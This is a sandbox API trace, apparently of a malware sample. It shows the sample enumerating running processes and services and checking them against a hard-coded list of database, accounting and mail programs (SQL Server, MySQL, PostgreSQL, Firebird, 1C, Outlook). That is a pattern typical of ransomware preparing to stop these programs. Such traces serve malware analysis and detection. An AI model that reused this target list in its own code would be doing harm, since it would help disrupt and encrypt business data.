	[0149.960] Process32FirstW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0149.960] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0149.961] lstrlenW (lpString="System") returned 6
	[0149.961] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0149.961] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0149.961] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0149.961] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0149.961] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0149.961] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0149.961] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0149.961] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0149.961] lstrlenW (lpString="smss.exe") returned 8
	[0149.961] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0149.961] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0149.961] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0149.961] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0149.961] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0149.961] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0149.961] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0149.961] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0149.962] lstrlenW (lpString="csrss.exe") returned 9
	[0149.962] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0149.962] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0149.962] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0149.962] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0149.962] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0149.962] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0149.962] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0149.962] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0149.962] lstrlenW (lpString="wininit.exe") returned 11
	[0149.962] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0149.962] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0149.962] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0149.962] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0149.962] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0149.962] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0149.963] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0149.963] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0149.963] lstrlenW (lpString="csrss.exe") returned 9
	[0149.963] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0149.963] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0149.963] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0149.963] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0149.963] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0149.963] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0149.963] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0149.963] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0149.963] lstrlenW (lpString="winlogon.exe") returned 12
	[0149.963] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0149.963] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0149.963] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0149.963] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0149.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0149.964] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0149.964] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0149.964] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0149.964] lstrlenW (lpString="services.exe") returned 12
	[0149.964] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0149.964] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0149.964] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0149.964] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0149.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0149.964] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0149.964] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0149.964] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0149.964] lstrlenW (lpString="lsass.exe") returned 9
	[0149.964] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0149.964] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0149.965] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0149.965] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0149.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0149.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0149.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0149.965] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0149.965] lstrlenW (lpString="lsm.exe") returned 7
	[0149.965] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0149.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0149.965] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0149.965] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0149.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0149.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0149.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0149.965] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.965] lstrlenW (lpString="svchost.exe") returned 11
	[0149.966] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0149.966] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.966] lstrlenW (lpString="svchost.exe") returned 11
	[0149.966] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0149.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0149.966] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.967] lstrlenW (lpString="svchost.exe") returned 11
	[0149.967] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0149.967] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.967] lstrlenW (lpString="svchost.exe") returned 11
	[0149.967] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0149.967] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0149.967] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.968] lstrlenW (lpString="svchost.exe") returned 11
	[0149.968] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0149.968] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0149.968] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0149.968] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0149.968] lstrlenW (lpString="audiodg.exe") returned 11
	[0149.968] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.968] lstrlenW (lpString="svchost.exe") returned 11
	[0149.968] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.969] lstrlenW (lpString="svchost.exe") returned 11
	[0149.969] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0149.969] lstrlenW (lpString="spoolsv.exe") returned 11
	[0149.969] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.969] lstrlenW (lpString="svchost.exe") returned 11
	[0149.969] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0149.970] lstrlenW (lpString="taskhost.exe") returned 12
	[0149.970] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0149.970] lstrlenW (lpString="userinit.exe") returned 12
	[0149.970] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0149.971] lstrlenW (lpString="dwm.exe") returned 7
	[0149.971] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0149.971] lstrlenW (lpString="explorer.exe") returned 12
	[0149.971] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0149.971] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0149.971] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0149.972] lstrlenW (lpString="reader_sl.exe") returned 13
	[0149.972] Process32NextW (in: hSnapshot=0x3b4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0149.972] CloseHandle (hObject=0x3b4) returned 1
	[0149.972] Sleep (dwMilliseconds=0x1f4) 
	[0150.844] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617020
	[0151.916] EnumServicesStatusExW (in: hSCManager=0xb617020, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0151.995] GetLastError () returned 0xea
	[0151.995] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xdea) returned 0xb612378
	[0151.995] EnumServicesStatusExW (in: hSCManager=0xb617020, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xdea, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0152.113] CloseServiceHandle (hSCObject=0xb617020) returned 1
	[0152.117] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0152.117] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0152.117] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0152.117] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0152.117] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0152.117] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0152.117] lstrlenW (lpString="AudioSrv") returned 8
	[0152.117] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0152.117] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0152.117] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0152.117] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0152.117] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0152.118] lstrlenW (lpString="BFE") returned 3
	[0152.118] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0152.118] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0152.118] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0152.118] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0152.118] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0152.118] lstrlenW (lpString="CryptSvc") returned 8
	[0152.118] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0152.118] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0152.118] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0152.118] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0152.118] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0152.118] lstrlenW (lpString="CscService") returned 10
	[0152.118] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0152.118] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0152.118] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0152.118] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0152.118] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0152.118] lstrlenW (lpString="DcomLaunch") returned 10
	[0152.118] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0152.118] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0152.118] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0152.118] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0152.118] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0152.118] lstrlenW (lpString="Dhcp") returned 4
	[0152.118] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0152.118] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0152.118] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0152.118] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0152.118] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0152.118] lstrlenW (lpString="Dnscache") returned 8
	[0152.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0152.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0152.119] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0152.119] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0152.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0152.119] lstrlenW (lpString="DPS") returned 3
	[0152.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0152.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0152.119] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0152.119] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0152.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0152.119] lstrlenW (lpString="eventlog") returned 8
	[0152.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0152.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0152.119] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0152.119] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0152.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0152.119] lstrlenW (lpString="EventSystem") returned 11
	[0152.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0152.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0152.119] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0152.119] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0152.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0152.119] lstrlenW (lpString="gpsvc") returned 5
	[0152.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0152.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0152.119] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0152.119] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0152.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0152.119] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0152.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0152.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0152.120] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0152.120] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0152.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0152.120] lstrlenW (lpString="lmhosts") returned 7
	[0152.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0152.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0152.120] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0152.120] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0152.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0152.120] lstrlenW (lpString="MMCSS") returned 5
	[0152.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0152.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0152.120] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0152.120] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0152.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0152.120] lstrlenW (lpString="MpsSvc") returned 6
	[0152.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0152.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0152.120] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0152.120] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0152.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
